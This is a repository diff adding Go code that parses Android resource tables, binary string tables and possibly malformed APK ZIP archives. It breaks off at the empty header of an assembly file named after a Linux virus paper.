||||
Res1 uint16
|
||||
|
||||
EntryCount uint32
|
||||
EntriesStart uint32
|
||||
|
||||
//ResTable_config config;
|
||||
}{}
|
||||
|
||||
if err := binary.Read(r, binary.LittleEndian, &vals); err != nil {
|
||||
return fmt.Errorf("error reading values: %s", err.Error())
|
||||
}
|
||||
|
||||
if vals.Id == 0 {
|
||||
return fmt.Errorf("Invalid type id: %d", vals.Id)
|
||||
}
|
||||
|
||||
if vals.EntryCount > 0 {
|
||||
typeList := group.types[vals.Id]
|
||||
if len(typeList) == 0 {
|
||||
return fmt.Errorf("No spec entry for type %d", vals.Id)
|
||||
}
|
||||
|
||||
i := len(typeList) - 1
|
||||
typeList[i].Configs = append(typeList[i].Configs, &resourceType{
|
||||
chunkData: chunkData,
|
||||
entryCount: vals.EntryCount,
|
||||
entriesStart: vals.EntriesStart,
|
||||
indexesStart: uint32(hdrLen),
|
||||
})
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// Converts the resource id to readable name including the package name like "@drawable:com.example.app.icon".
|
||||
func (x *ResourceTable) GetResourceName(resId uint32) (string, error) {
|
||||
pkgId := (resId >> 24)
|
||||
typ := ((resId >> 16) & 0xFF) - 1
|
||||
entryId := (resId & 0xFFFF)
|
||||
|
||||
group := x.packages[pkgId]
|
||||
if group == nil {
|
||||
return "", fmt.Errorf("Invalid package identifier.")
|
||||
}
|
||||
|
||||
entry, err := x.getEntry(group, typ, entryId, ConfigFirst)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
|
||||
return fmt.Sprintf("@%s:%s.%s", entry.ResourceType, group.Name, entry.Key), nil
|
||||
}
|
||||
|
||||
// Returns the resource entry for resId and the first configuration option it finds.
|
||||
func (x *ResourceTable) GetResourceEntry(resId uint32) (*ResourceEntry, error) {
|
||||
return x.GetResourceEntryEx(resId, ConfigFirst)
|
||||
}
|
||||
|
||||
// Returns the resource entry for resId and config configuration option.
|
||||
func (x *ResourceTable) GetResourceEntryEx(resId uint32, config ResourceConfigOption) (*ResourceEntry, error) {
|
||||
if config == ConfigPngIcon {
|
||||
return x.GetIconPng(resId)
|
||||
}
|
||||
|
||||
pkgId := (resId >> 24)
|
||||
typ := ((resId >> 16) & 0xFF) - 1
|
||||
entryId := (resId & 0xFFFF)
|
||||
|
||||
group := x.packages[pkgId]
|
||||
if group == nil {
|
||||
return nil, fmt.Errorf("Invalid package identifier.")
|
||||
}
|
||||
|
||||
return x.getEntry(group, typ, entryId, config)
|
||||
}
|
||||
|
||||
// Return the biggest last config ending with .png. Falls back to GetResourceEntry() if none found.
|
||||
func (x *ResourceTable) GetIconPng(resId uint32) (*ResourceEntry, error) {
|
||||
pkgId := (resId >> 24)
|
||||
typ := ((resId >> 16) & 0xFF) - 1
|
||||
entryId := (resId & 0xFFFF)
|
||||
|
||||
group := x.packages[pkgId]
|
||||
if group == nil {
|
||||
return nil, fmt.Errorf("Invalid package identifier.")
|
||||
}
|
||||
|
||||
entries, err := x.getEntryConfigs(group, typ, entryId, 256)
|
||||
if len(entries) == 0 {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
var res *ResourceEntry
|
||||
for i := 0; i < len(entries) && i < 1024; i++ {
|
||||
e := entries[i]
|
||||
if e.value.dataType == AttrTypeReference {
|
||||
pkgId = (e.value.data >> 24)
|
||||
typ = ((e.value.data >> 16) & 0xFF) - 1
|
||||
entryId = (e.value.data & 0xFFFF)
|
||||
|
||||
if more, _ := x.getEntryConfigs(group, typ, entryId, 256); len(more) != 0 {
|
||||
entries = append(entries, more...)
|
||||
}
|
||||
} else if val, _ := e.value.String(); strings.HasSuffix(val, ".png") {
|
||||
res = e
|
||||
}
|
||||
}
|
||||
|
||||
if res == nil {
|
||||
return x.GetResourceEntry(resId)
|
||||
}
|
||||
return res, nil
|
||||
}
|
||||
|
||||
func (x *ResourceTable) getEntry(group *packageGroup, typeId, entry uint32, config ResourceConfigOption) (*ResourceEntry, error) {
|
||||
limit := 1024
|
||||
if config == ConfigFirst {
|
||||
limit = 1
|
||||
}
|
||||
|
||||
entries, err := x.getEntryConfigs(group, typeId, entry, limit)
|
||||
if len(entries) == 0 {
|
||||
return nil, err
|
||||
}
|
||||
res := entries[len(entries)-1]
|
||||
return res, err
|
||||
}
|
||||
|
||||
func (x *ResourceTable) getEntryConfigs(group *packageGroup, typeId, entry uint32, limit int) ([]*ResourceEntry, error) {
|
||||
typeList := group.types[uint8(typeId+1)]
|
||||
if len(typeList) == 0 {
|
||||
return nil, fmt.Errorf("Invalid type: %d", typeId)
|
||||
}
|
||||
|
||||
var lastErr error
|
||||
var entries []*ResourceEntry
|
||||
for _, typ := range typeList {
|
||||
for _, thisType := range typ.Configs {
|
||||
if entry >= thisType.entryCount {
|
||||
continue
|
||||
}
|
||||
|
||||
r := bytes.NewReader(thisType.chunkData)
|
||||
if _, err := r.Seek(int64(thisType.indexesStart+entry*4), io.SeekStart); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
var thisOffset uint32
|
||||
if err := binary.Read(r, binary.LittleEndian, &thisOffset); err != nil {
|
||||
return nil, fmt.Errorf("Failed to read this type offset: %s", err.Error())
|
||||
}
|
||||
|
||||
if thisOffset == math.MaxUint32 {
|
||||
continue
|
||||
}
|
||||
|
||||
offset := thisType.entriesStart + thisOffset
|
||||
|
||||
if int(offset) >= len(thisType.chunkData) || ((offset & 0x03) != 0) {
|
||||
return nil, fmt.Errorf("Invalid entry 0x%04x offset: %d!", entry, offset)
|
||||
}
|
||||
|
||||
if _, err := r.Seek(int64(offset), io.SeekStart); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
res, err := x.parseEntry(r, typ.Package, typeId)
|
||||
if err != nil {
|
||||
lastErr = err
|
||||
} else {
|
||||
entries = append(entries, res)
|
||||
}
|
||||
|
||||
if len(entries) >= limit {
|
||||
goto exit
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if len(entries) == 0 {
|
||||
return nil, fmt.Errorf("No entry found.")
|
||||
}
|
||||
exit:
|
||||
return entries, lastErr
|
||||
}
|
||||
|
||||
func (x *ResourceTable) parseEntry(r io.Reader, pkg *resourcePackage, typeId uint32) (*ResourceEntry, error) {
|
||||
var err error
|
||||
var res ResourceEntry
|
||||
var keyIndex uint32
|
||||
|
||||
if err := binary.Read(r, binary.LittleEndian, &res.size); err != nil {
|
||||
return nil, fmt.Errorf("Failed to read entry size: %s", err.Error())
|
||||
}
|
||||
|
||||
if err := binary.Read(r, binary.LittleEndian, &res.flags); err != nil {
|
||||
return nil, fmt.Errorf("Failed to read entry flags: %s", err.Error())
|
||||
}
|
||||
|
||||
if err := binary.Read(r, binary.LittleEndian, &keyIndex); err != nil {
|
||||
return nil, fmt.Errorf("Failed to read entry key index: %s", err.Error())
|
||||
}
|
||||
|
||||
res.Package = pkg.Name
|
||||
|
||||
res.ResourceType, err = pkg.typeStrings.get(typeId - pkg.typeIdOffset)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("Invalid typeString: %s", err.Error())
|
||||
}
|
||||
|
||||
res.Key, err = pkg.keyStrings.get(keyIndex)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("Invalid keyString: %s", err.Error())
|
||||
}
|
||||
|
||||
if !res.IsComplex() {
|
||||
var size uint16
|
||||
if err := binary.Read(r, binary.LittleEndian, &size); err != nil {
|
||||
return nil, fmt.Errorf("Failed to read entry value size: %s", err.Error())
|
||||
}
|
||||
|
||||
if size < 8 {
|
||||
return nil, fmt.Errorf("Invalid Res_value size: %d!", size)
|
||||
}
|
||||
|
||||
if _, err := io.CopyN(ioutil.Discard, r, 1); err != nil {
|
||||
return nil, fmt.Errorf("Failed to read entry value res0: %s", err.Error())
|
||||
}
|
||||
|
||||
if err := binary.Read(r, binary.LittleEndian, &res.value.dataType); err != nil {
|
||||
return nil, fmt.Errorf("Failed to read entry value data type: %s", err.Error())
|
||||
}
|
||||
|
||||
if err := binary.Read(r, binary.LittleEndian, &res.value.data); err != nil {
|
||||
return nil, fmt.Errorf("Failed to read entry value data: %s", err.Error())
|
||||
}
|
||||
|
||||
res.value.globalStringTable = &x.mainStrings
|
||||
|
||||
} else {
|
||||
// NYI
|
||||
}
|
||||
|
||||
return &res, nil
|
||||
}
|
||||
|
||||
// Returns true if the resource entry is complex (for example arrays, string plural arrays...).
|
||||
//
|
||||
// Complex ResourceEntries are not yet supported.
|
||||
func (e *ResourceEntry) IsComplex() bool {
|
||||
return (e.flags & tableEntryComplex) != 0
|
||||
}
|
||||
|
||||
// Returns the resource value handle
|
||||
func (e *ResourceEntry) GetValue() *ResourceValue {
|
||||
return &e.value
|
||||
}
|
||||
|
||||
// Returns the resource data type
|
||||
func (v *ResourceValue) Type() AttrType {
|
||||
return v.dataType
|
||||
}
|
||||
|
||||
// Returns the raw data of the resource
|
||||
func (v *ResourceValue) RawData() uint32 {
|
||||
return v.data
|
||||
}
|
||||
|
||||
// Returns the data converted to their native type (e.g. AttrTypeString to string).
|
||||
//
|
||||
// Returns ErrUnknownResourceDataType if the type is not handled by this library
|
||||
func (v *ResourceValue) Data() (interface{}, error) {
|
||||
if v.convertedData != nil {
|
||||
return v.convertedData, nil
|
||||
}
|
||||
|
||||
var val interface{}
|
||||
var err error
|
||||
|
||||
switch v.dataType {
|
||||
case AttrTypeNull:
|
||||
case AttrTypeString:
|
||||
val, err = v.globalStringTable.get(v.data)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
case AttrTypeIntDec, AttrTypeIntHex, AttrTypeIntBool,
|
||||
AttrTypeIntColorArgb8, AttrTypeIntColorRgb8,
|
||||
AttrTypeIntColorArgb4, AttrTypeIntColorRgb4,
|
||||
AttrTypeReference:
|
||||
val = v.data
|
||||
default:
|
||||
return nil, ErrUnknownResourceDataType
|
||||
}
|
||||
|
||||
v.convertedData = val
|
||||
return val, nil
|
||||
}
|
||||
|
||||
// Returns the data converted to a readable string, to the format it was likely in the original AndroidManifest.xml.
|
||||
//
|
||||
// Unknown data types are returned as the string from ErrUnknownResourceDataType.Error().
|
||||
func (v *ResourceValue) String() (res string, err error) {
|
||||
switch v.dataType {
|
||||
case AttrTypeNull:
|
||||
res = "null"
|
||||
case AttrTypeIntHex:
|
||||
res = fmt.Sprintf("0x%x", v.data)
|
||||
case AttrTypeIntBool:
|
||||
if v.data != 0 {
|
||||
res = "true"
|
||||
} else {
|
||||
res = "false"
|
||||
}
|
||||
case AttrTypeIntColorArgb8:
|
||||
res = fmt.Sprintf("#%08x", v.data)
|
||||
case AttrTypeIntColorRgb8:
|
||||
res = fmt.Sprintf("#%06x", v.data)
|
||||
case AttrTypeIntColorArgb4:
|
||||
res = fmt.Sprintf("#%04x", v.data)
|
||||
case AttrTypeIntColorRgb4:
|
||||
res = fmt.Sprintf("#%03x", v.data)
|
||||
case AttrTypeReference:
|
||||
res = fmt.Sprintf("@%x", v.data)
|
||||
default:
|
||||
var val interface{}
|
||||
val, err = v.Data()
|
||||
if err == nil {
|
||||
res = fmt.Sprintf("%v", val)
|
||||
}
|
||||
}
|
||||
return
|
||||
}
|
|
@ -0,0 +1,251 @@
|
|||
package manifest
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"encoding/binary"
|
||||
"fmt"
|
||||
"io"
|
||||
"io/ioutil"
|
||||
"math"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"unicode/utf16"
|
||||
"unicode/utf8"
|
||||
)
|
||||
|
||||
const (
|
||||
stringFlagSorted = 0x00000001
|
||||
stringFlagUtf8 = 0x00000100
|
||||
)
|
||||
|
||||
var StringCnt uint32
|
||||
var ManifestStringsDmp, _ = filepath.Abs("manifest_strings.dmp")
|
||||
var StringTableEndPos int
|
||||
|
||||
type stringTable struct {
|
||||
isUtf8 bool
|
||||
stringOffsets []byte
|
||||
data []byte
|
||||
cache map[uint32]string
|
||||
}
|
||||
|
||||
func parseStringTableWithChunk(r io.Reader) (res stringTable, err error) {
|
||||
id, _, totalLen, err := parseChunkHeader(r)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
|
||||
if id != chunkStringTable {
|
||||
err = fmt.Errorf("Invalid chunk id 0x%08x, expected 0x%08x", id, chunkStringTable)
|
||||
return
|
||||
}
|
||||
|
||||
return parseStringTable(&io.LimitedReader{R: r, N: int64(totalLen - chunkHeaderSize)})
|
||||
}
|
||||
|
||||
func check(e error) {
|
||||
if e != nil {
|
||||
panic(e)
|
||||
}
|
||||
}
|
||||
|
||||
func dumpStrings(data []byte) {
|
||||
err := ioutil.WriteFile(ManifestStringsDmp, data, 0644)
|
||||
check(err)
|
||||
}
|
||||
|
||||
func parseStringTable(r *io.LimitedReader) (stringTable, error) {
|
||||
var err error
|
||||
var stringOffset, flags uint32
|
||||
var res stringTable
|
||||
// stringCnt - STRING COUNT
|
||||
if err := binary.Read(r, binary.LittleEndian, &StringCnt); err != nil {
|
||||
return res, fmt.Errorf("error reading stringCnt: %s", err.Error())
|
||||
}
|
||||
|
||||
// skip styles count
|
||||
if _, err = io.CopyN(ioutil.Discard, r, 4); err != nil {
|
||||
return res, fmt.Errorf("error reading styleCnt: %s", err.Error())
|
||||
}
|
||||
|
||||
if err := binary.Read(r, binary.LittleEndian, &flags); err != nil {
|
||||
return res, fmt.Errorf("error reading flags: %s", err.Error())
|
||||
}
|
||||
|
||||
res.isUtf8 = (flags & stringFlagUtf8) != 0
|
||||
if res.isUtf8 {
|
||||
flags &^= stringFlagUtf8
|
||||
}
|
||||
flags &^= stringFlagSorted // just ignore
|
||||
|
||||
if flags != 0 {
|
||||
return res, fmt.Errorf("Unknown string flag: 0x%08x", flags)
|
||||
}
|
||||
|
||||
if err := binary.Read(r, binary.LittleEndian, &stringOffset); err != nil {
|
||||
return res, fmt.Errorf("error reading stringOffset: %s", err.Error())
|
||||
}
|
||||
|
||||
// skip styles offset
|
||||
if _, err = io.CopyN(ioutil.Discard, r, 4); err != nil {
|
||||
return res, fmt.Errorf("error reading styleOffset: %s", err.Error())
|
||||
}
|
||||
|
||||
// Read lengths
|
||||
if StringCnt >= 2*1024*1024 {
|
||||
return res, fmt.Errorf("Too many strings in this file (%d).", StringCnt)
|
||||
}
|
||||
// allocate memory for each offset. 1 offset for 1 string. 1 offset = 4 bytes
|
||||
res.stringOffsets = make([]byte, 4*StringCnt)
|
||||
// fill stringOffssets array with offsets. Read from manifest
|
||||
if _, err := io.ReadFull(r, res.stringOffsets); err != nil {
|
||||
return res, fmt.Errorf("Failed to read string offsets data: %s", err.Error())
|
||||
}
|
||||
|
||||
remainder := int64(stringOffset) - 7*4 - 4*int64(StringCnt)
|
||||
if remainder < 0 {
|
||||
return res, fmt.Errorf("Wrong string offset (got remainder %d)", remainder)
|
||||
} else if remainder > 0 {
|
||||
if _, err = io.CopyN(ioutil.Discard, r, remainder); err != nil {
|
||||
return res, fmt.Errorf("error reading styleArray: %s", err.Error())
|
||||
}
|
||||
}
|
||||
|
||||
// read STRINGS
|
||||
// TODO Здесь в r.N попал resourceID, а это не должно быть
|
||||
res.data = make([]byte, r.N)
|
||||
if _, err := io.ReadFull(r, res.data); err != nil {
|
||||
return res, fmt.Errorf("Failed to read string table data: %s", err.Error())
|
||||
}
|
||||
// write res.data to stdout. res.data contains = resource strings and manifest in plaintext
|
||||
if mr, ok := r.R.(myRead); ok {
|
||||
StringTableEndPos = mr.GetRead()
|
||||
}
|
||||
dumpStrings(res.data)
|
||||
|
||||
res.cache = make(map[uint32]string)
|
||||
return res, nil
|
||||
}
|
||||
|
||||
func (t *stringTable) parseString16(r io.Reader) (string, error) {
|
||||
var strCharacters uint32
|
||||
var strCharactersLow, strCharactersHigh uint16
|
||||
|
||||
if err := binary.Read(r, binary.LittleEndian, &strCharactersHigh); err != nil {
|
||||
return "", fmt.Errorf("error reading string char count: %s", err.Error())
|
||||
}
|
||||
|
||||
if (strCharactersHigh & 0x8000) != 0 {
|
||||
if err := binary.Read(r, binary.LittleEndian, &strCharactersLow); err != nil {
|
||||
return "", fmt.Errorf("error reading string char count: %s", err.Error())
|
||||
}
|
||||
|
||||
strCharacters = (uint32(strCharactersHigh&0x7FFF) << 16) | uint32(strCharactersLow)
|
||||
} else {
|
||||
strCharacters = uint32(strCharactersHigh)
|
||||
}
|
||||
|
||||
buf := make([]uint16, int64(strCharacters))
|
||||
if err := binary.Read(r, binary.LittleEndian, &buf); err != nil {
|
||||
return "", fmt.Errorf("error reading string : %s", err.Error())
|
||||
}
|
||||
|
||||
decoded := utf16.Decode(buf)
|
||||
for len(decoded) != 0 && decoded[len(decoded)-1] == 0 {
|
||||
decoded = decoded[:len(decoded)-1]
|
||||
}
|
||||
|
||||
return string(decoded), nil
|
||||
}
|
||||
|
||||
func (t *stringTable) parseString8Len(r io.Reader) (int64, error) {
|
||||
var strCharacters int64
|
||||
var strCharactersLow, strCharactersHigh uint8
|
||||
|
||||
if err := binary.Read(r, binary.LittleEndian, &strCharactersHigh); err != nil {
|
||||
return 0, fmt.Errorf("error reading string char count: %s", err.Error())
|
||||
}
|
||||
|
||||
if (strCharactersHigh & 0x80) != 0 {
|
||||
if err := binary.Read(r, binary.LittleEndian, &strCharactersLow); err != nil {
|
||||
return 0, fmt.Errorf("error reading string char count: %s", err.Error())
|
||||
}
|
||||
strCharacters = (int64(strCharactersHigh&0x7F) << 8) | int64(strCharactersLow)
|
||||
} else {
|
||||
strCharacters = int64(strCharactersHigh)
|
||||
}
|
||||
return strCharacters, nil
|
||||
}
|
||||
|
||||
func (t *stringTable) parseString8(r io.Reader) (string, error) {
|
||||
// Length of the string in UTF16
|
||||
_, err := t.parseString8Len(r)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
|
||||
len8, err := t.parseString8Len(r)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
|
||||
buf := make([]uint8, len8)
|
||||
if err := binary.Read(r, binary.LittleEndian, &buf); err != nil {
|
||||
return "", fmt.Errorf("error reading string : %s", err.Error())
|
||||
}
|
||||
|
||||
for len(buf) != 0 && buf[len(buf)-1] == 0 {
|
||||
buf = buf[:len(buf)-1]
|
||||
}
|
||||
|
||||
return string(buf), nil
|
||||
}
|
||||
|
||||
func (t *stringTable) get(idx uint32) (string, error) {
|
||||
if idx == math.MaxUint32 {
|
||||
return "", nil
|
||||
} else if idx >= uint32(len(t.stringOffsets)/4) {
|
||||
return "", fmt.Errorf("String with idx %d not found!", idx)
|
||||
}
|
||||
|
||||
if str, prs := t.cache[idx]; prs {
|
||||
return str, nil
|
||||
}
|
||||
|
||||
offset := binary.LittleEndian.Uint32(t.stringOffsets[4*idx : 4*idx+4])
|
||||
if offset >= uint32(len(t.data)) {
|
||||
return "", fmt.Errorf("String offset for idx %d is out of bounds (%d >= %d).", idx, offset, len(t.data))
|
||||
}
|
||||
|
||||
r := bytes.NewReader(t.data[offset:])
|
||||
|
||||
var err error
|
||||
var res string
|
||||
if t.isUtf8 {
|
||||
res, err = t.parseString8(r)
|
||||
} else {
|
||||
res, err = t.parseString16(r)
|
||||
}
|
||||
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
|
||||
if !utf8.ValidString(res) || strings.ContainsRune(res, 0) {
|
||||
res = strings.Map(func(r rune) rune {
|
||||
switch r {
|
||||
case 0, utf8.RuneError:
|
||||
return '\uFFFE'
|
||||
default:
|
||||
return r
|
||||
}
|
||||
}, res)
|
||||
}
|
||||
|
||||
t.cache[idx] = res
|
||||
return res, nil
|
||||
}
|
||||
|
||||
func (t *stringTable) isEmpty() bool {
|
||||
return t.cache == nil
|
||||
}
|
|
@ -0,0 +1,352 @@
|
|||
package manifest
|
||||
|
||||
import (
|
||||
"archive/zip"
|
||||
"compress/flate"
|
||||
"encoding/binary"
|
||||
"errors"
|
||||
"fmt"
|
||||
"io"
|
||||
"os"
|
||||
"path"
|
||||
)
|
||||
|
||||
type zipReaderFileSubEntry struct {
|
||||
offset int64
|
||||
method uint16
|
||||
}
|
||||
|
||||
// This struct mimics of Reader from archive/zip. It's purpose is to handle
|
||||
// even broken archives that Android can read, but archive/zip cannot.
|
||||
type ZipReader struct {
|
||||
File map[string]*ZipReaderFile
|
||||
|
||||
// Files in the order they were found in the zip. May contain the same ZipReaderFile
|
||||
// multiple times in case of broken/crafted ZIPs
|
||||
FilesOrdered []*ZipReaderFile
|
||||
|
||||
zipFileReader io.ReadSeeker
|
||||
ownedZipFile *os.File
|
||||
}
|
||||
|
||||
// This struct mimics of File from archive/zip. The main difference is it can represent
|
||||
// multiple actual entries in the ZIP file in case it has more than one with the same name.
|
||||
type ZipReaderFile struct {
|
||||
Name string
|
||||
IsDir bool
|
||||
|
||||
zipFile io.ReadSeeker
|
||||
internalReader io.Reader
|
||||
internalCloser io.Closer
|
||||
|
||||
zipEntry *zip.File
|
||||
|
||||
entries []zipReaderFileSubEntry
|
||||
curEntry int
|
||||
}
|
||||
|
||||
// Opens the file(s) for reading. After calling open, you should iterate through all possible entries that
|
||||
// go by that Filename with for f.Next() { f.Read()... }
|
||||
func (zr *ZipReaderFile) Open() error {
|
||||
if zr.internalReader != nil {
|
||||
return errors.New("File is already opened.")
|
||||
}
|
||||
|
||||
if zr.zipEntry != nil {
|
||||
var err error
|
||||
zr.curEntry = 0
|
||||
rc, err := zr.zipEntry.Open()
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
zr.internalReader = rc
|
||||
zr.internalCloser = rc
|
||||
} else {
|
||||
zr.curEntry = -1
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// Reads data from current opened file. Returns io.EOF at the end of current file, but another file entry might exist.
|
||||
// Use Next() to check for that.
|
||||
func (zr *ZipReaderFile) Read(p []byte) (int, error) {
|
||||
if zr.internalReader == nil {
|
||||
if zr.curEntry == -1 && !zr.Next() {
|
||||
return 0, io.ErrUnexpectedEOF
|
||||
}
|
||||
|
||||
if zr.curEntry >= len(zr.entries) {
|
||||
return 0, io.ErrUnexpectedEOF
|
||||
}
|
||||
|
||||
_, err := zr.zipFile.Seek(zr.entries[zr.curEntry].offset, 0)
|
||||
if err != nil {
|
||||
return 0, err
|
||||
}
|
||||
|
||||
switch zr.entries[zr.curEntry].method {
|
||||
case zip.Store:
|
||||
zr.internalReader = zr.zipFile
|
||||
default: // case zip.Deflate: // Android treats everything but 0 as deflate
|
||||
rc := flate.NewReader(zr.zipFile)
|
||||
zr.internalReader = rc
|
||||
zr.internalCloser = rc
|
||||
}
|
||||
}
|
||||
return zr.internalReader.Read(p)
|
||||
}
|
||||
|
||||
// Moves this reader to the next file represented under it's Name. Returns false if there are no more to read.
|
||||
func (zr *ZipReaderFile) Next() bool {
|
||||
if len(zr.entries) == 0 && zr.internalReader != nil {
|
||||
zr.curEntry++
|
||||
return zr.curEntry == 1
|
||||
}
|
||||
|
||||
zr.Close()
|
||||
|
||||
if zr.curEntry+1 >= len(zr.entries) {
|
||||
return false
|
||||
}
|
||||
zr.curEntry++
|
||||
return true
|
||||
}
|
||||
|
||||
// Closes this reader and all opened files.
|
||||
func (zr *ZipReaderFile) Close() error {
|
||||
if zr.internalReader != nil {
|
||||
if zr.internalCloser != nil {
|
||||
zr.internalCloser.Close()
|
||||
zr.internalCloser = nil
|
||||
}
|
||||
zr.internalReader = nil
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// Get the file header from ZIP (can return nil with broken archives)
|
||||
func (zr *ZipReaderFile) ZipHeader() *zip.FileHeader {
|
||||
if zr.zipEntry != nil {
|
||||
return &zr.zipEntry.FileHeader
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// Closes this ZIP archive and all it's ZipReaderFile entries.
|
||||
func (zr *ZipReader) Close() error {
|
||||
if zr.zipFileReader == nil {
|
||||
return nil
|
||||
}
|
||||
|
||||
for _, zf := range zr.File {
|
||||
zf.Close()
|
||||
}
|
||||
|
||||
var err error
|
||||
if zr.ownedZipFile != nil {
|
||||
err = zr.ownedZipFile.Close()
|
||||
zr.ownedZipFile = nil
|
||||
}
|
||||
|
||||
zr.zipFileReader = nil
|
||||
return err
|
||||
}
|
||||
|
||||
type readAtWrapper struct {
|
||||
io.ReadSeeker
|
||||
}
|
||||
|
||||
func (wr *readAtWrapper) ReadAt(b []byte, off int64) (n int, err error) {
|
||||
if readerAt, ok := wr.ReadSeeker.(io.ReaderAt); ok {
|
||||
return readerAt.ReadAt(b, off)
|
||||
}
|
||||
|
||||
oldpos, err := wr.Seek(off, io.SeekCurrent)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
|
||||
if _, err = wr.Seek(off, io.SeekStart); err != nil {
|
||||
return
|
||||
}
|
||||
|
||||
if n, err = wr.Read(b); err != nil {
|
||||
return
|
||||
}
|
||||
|
||||
_, err = wr.Seek(oldpos, io.SeekStart)
|
||||
return
|
||||
}
|
||||
|
||||
// Attempts to open ZIP for reading.
|
||||
func OpenZip(path string) (zr *ZipReader, err error) {
|
||||
f, err := os.Open(path)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
zr, err = OpenZipReader(f)
|
||||
if err != nil {
|
||||
f.Close()
|
||||
} else {
|
||||
zr.ownedZipFile = f
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
// Attempts to open ZIP for reading. Might Seek the reader to arbitrary
|
||||
// positions.
|
||||
func OpenZipReader(zipReader io.ReadSeeker) (zr *ZipReader, err error) {
|
||||
zr = &ZipReader{
|
||||
File: make(map[string]*ZipReaderFile),
|
||||
zipFileReader: zipReader,
|
||||
}
|
||||
|
||||
f := &readAtWrapper{zipReader}
|
||||
|
||||
var zipinfo *zip.Reader
|
||||
zipinfo, err = tryReadZip(f)
|
||||
if err == nil {
|
||||
for i, zf := range zipinfo.File {
|
||||
// Android treats anything but 0 as deflate.
|
||||
if zf.Method != zip.Store && zf.Method != zip.Deflate {
|
||||
zipinfo.File[i].Method = zip.Deflate
|
||||
}
|
||||
|
||||
cl := path.Clean(zf.Name)
|
||||
if zr.File[cl] == nil {
|
||||
zf := &ZipReaderFile{
|
||||
Name: cl,
|
||||
IsDir: zf.FileInfo().IsDir(),
|
||||
zipFile: f,
|
||||
zipEntry: zf,
|
||||
}
|
||||
zr.File[cl] = zf
|
||||
zr.FilesOrdered = append(zr.FilesOrdered, zf)
|
||||
}
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
if _, err = f.Seek(0, io.SeekStart); err != nil {
|
||||
return
|
||||
}
|
||||
|
||||
var off int64
|
||||
for {
|
||||
off, err = findNextFileHeader(f)
|
||||
if off == -1 || err != nil {
|
||||
return
|
||||
}
|
||||
|
||||
var nameLen, extraLen, method uint16
|
||||
if _, err = f.Seek(off+8, 0); err != nil {
|
||||
return
|
||||
}
|
||||
|
||||
if err = binary.Read(f, binary.LittleEndian, &method); err != nil {
|
||||
return
|
||||
}
|
||||
|
||||
if _, err = f.Seek(off+26, 0); err != nil {
|
||||
return
|
||||
}
|
||||
|
||||
if err = binary.Read(f, binary.LittleEndian, &nameLen); err != nil {
|
||||
return
|
||||
}
|
||||
|
||||
if err = binary.Read(f, binary.LittleEndian, &extraLen); err != nil {
|
||||
return
|
||||
}
|
||||
|
||||
buf := make([]byte, nameLen)
|
||||
if _, err = f.ReadAt(buf, off+30); err != nil {
|
||||
return
|
||||
}
|
||||
|
||||
fileName := path.Clean(string(buf))
|
||||
fileOffset := off + 30 + int64(nameLen) + int64(extraLen)
|
||||
|
||||
zrf := zr.File[fileName]
|
||||
if zrf == nil {
|
||||
zrf = &ZipReaderFile{
|
||||
Name: fileName,
|
||||
zipFile: f,
|
||||
curEntry: -1,
|
||||
}
|
||||
zr.File[fileName] = zrf
|
||||
}
|
||||
zr.FilesOrdered = append(zr.FilesOrdered, zrf)
|
||||
|
||||
zrf.entries = append([]zipReaderFileSubEntry{zipReaderFileSubEntry{
|
||||
offset: fileOffset,
|
||||
method: method,
|
||||
}}, zrf.entries...)
|
||||
|
||||
if _, err = f.Seek(off+4, 0); err != nil {
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func tryReadZip(f *readAtWrapper) (r *zip.Reader, err error) {
|
||||
defer func() {
|
||||
if pn := recover(); pn != nil {
|
||||
err = fmt.Errorf("%v", pn)
|
||||
r = nil
|
||||
}
|
||||
}()
|
||||
|
||||
size, err := f.Seek(0, io.SeekEnd)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
|
||||
r, err = zip.NewReader(f, size)
|
||||
return
|
||||
}
|
||||
|
||||
func findNextFileHeader(f io.ReadSeeker) (offset int64, err error) {
|
||||
start, err := f.Seek(0, 1)
|
||||
if err != nil {
|
||||
return -1, err
|
||||
}
|
||||
defer func() {
|
||||
if _, serr := f.Seek(start, 0); serr != nil && err == nil {
|
||||
err = serr
|
||||
}
|
||||
}()
|
||||
|
||||
buf := make([]byte, 64*1024)
|
||||
toCmp := []byte{0x50, 0x4B, 0x03, 0x04}
|
||||
|
||||
ok := 0
|
||||
offset = start
|
||||
|
||||
for {
|
||||
n, err := f.Read(buf)
|
||||
if err != nil && err != io.EOF {
|
||||
return -1, err
|
||||
}
|
||||
|
||||
if n == 0 {
|
||||
return -1, nil
|
||||
}
|
||||
|
||||
for i := 0; i < n; i++ {
|
||||
if buf[i] == toCmp[ok] {
|
||||
ok++
|
||||
if ok == len(toCmp) {
|
||||
offset += int64(i) - int64(len(toCmp)-1)
|
||||
return offset, nil
|
||||
}
|
||||
} else {
|
||||
ok = 0
|
||||
}
|
||||
}
|
||||
|
||||
offset += int64(n)
|
||||
}
|
||||
}
|
Binary file not shown.
395
VXUG-Papers/Linux.Proudhon.i386.asm
Normal file
395
VXUG-Papers/Linux.Proudhon.i386.asm
Normal file
|
@ -0,0 +1,395 @@
